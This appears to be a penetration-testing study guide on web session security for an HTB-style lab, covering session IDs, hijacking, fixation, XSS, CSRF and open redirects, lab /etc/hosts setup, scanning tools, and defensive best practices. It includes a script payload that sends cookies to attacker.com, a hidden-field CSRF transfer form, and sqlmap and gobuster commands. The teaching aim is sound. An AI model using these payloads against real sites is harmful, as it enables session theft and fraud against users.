Session Security Guide
Introduction to Sessions
Stateless HTTP
HTTP is stateless, meaning each request is treated independently. Web applications use sessions to maintain user state across multiple requests.
Session Identifiers (Session IDs)
Unique tokens that identify a user's session.
Stored in cookies, URL parameters, or HTML.
Each storage method has security implications.
Session ID Security Best Practices
Uniqueness: Each session ID should be unique to prevent duplication.
Randomness: Must be generated using a strong random number generator.
Expiration: Should expire after a reasonable time to reduce risk.
Common Session Attacks
Session Hijacking
Concept: An attacker obtains a valid session ID to impersonate a user.
Example: Using curl with a captured session cookie:
curl -b "sessionid=captured_session_id" https://target.com/protected_pageExample: Using a browser's cookie editor to inject a session ID manually.
Session Fixation
Concept: An attacker sets a session ID and forces the victim to use it.
Example: Attacker assigns a session ID:
curl -b "sessionid=attacker_session_id" https://target.com/Cross-Site Scripting (XSS) - Session ID Theft
Concept: Injected JavaScript can steal session IDs.
Example: Injecting JavaScript to steal cookies:
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>Example: Using curl to test for reflected XSS:
curl "https://target.com/page?param=<script>alert(1)</script>"Cross-Site Request Forgery (CSRF)
Concept: Tricks a user into performing an action they did not intend while authenticated.
Example: Malicious HTML form to trigger CSRF attack:
<form action="https://target.com/transfer" method="POST">
<input type="hidden" name="account" value="attacker_account">
<input type="hidden" name="amount" value="1000">
<input type="submit" value="Transfer Money">
</form>Example: Using curl to send a CSRF request:
curl -X POST -d "account=attacker_account&amount=1000&csrf_token=known_token" https://target.com/transferOpen Redirects
Concept: Redirecting users to malicious sites.
Example: Testing for open redirects using curl:
curl -i "https://target.com/redirect?url=https://attacker.com"Example: Using wfuzz to fuzz for open redirect vulnerabilities:
wfuzz -c -z file,redirect_urls.txt https://target.com/redirect?url=FUZZ/etc/hosts File Manipulation for Lab Environments
Adding Host Entries
Single entry:
echo "<TARGET_IP> target.com" | sudo tee -a /etc/hostsMultiple entries:
IP="<TARGET_IP>"
echo -e "$IP\txss.htb.net\n$IP\tcsrf.htb.net\n$IP\toredirect.htb.net\n$IP\tminilab.htb.net" | sudo tee -a /etc/hostsViewing file contents:
cat /etc/hostsEditing the file:
sudo nano /etc/hosts
# or
sudo vim /etc/hostsEssential Security Tools
Nmap - Network Scanning
nmap -sV -sC https://target.comGobuster - Directory Brute Forcing
gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100SQLmap - SQL Injection Detection
sqlmap -u "https://target.com/page.php?id=1" --dbsNikto - Web Server Scanning
nikto -h https://target.comBurp Suite
Burp Intruder: Automated fuzzing and brute-forcing.
Burp Repeater: Manually crafting and replaying HTTP requests.
Burp Scanner: Automated vulnerability scanning.
Security Best Practices
Use strong, randomly generated session IDs.
Store session IDs securely with HTTPOnly and Secure flags.
Implement CSRF protection using tokens.
Validate and sanitize all user input.
Use output encoding to prevent XSS.
Regenerate session IDs after login and sensitive actions.
Implement proper session timeouts.
Use HTTPS for all communication.
Consider deploying a Web Application Firewall (WAF).
Last updated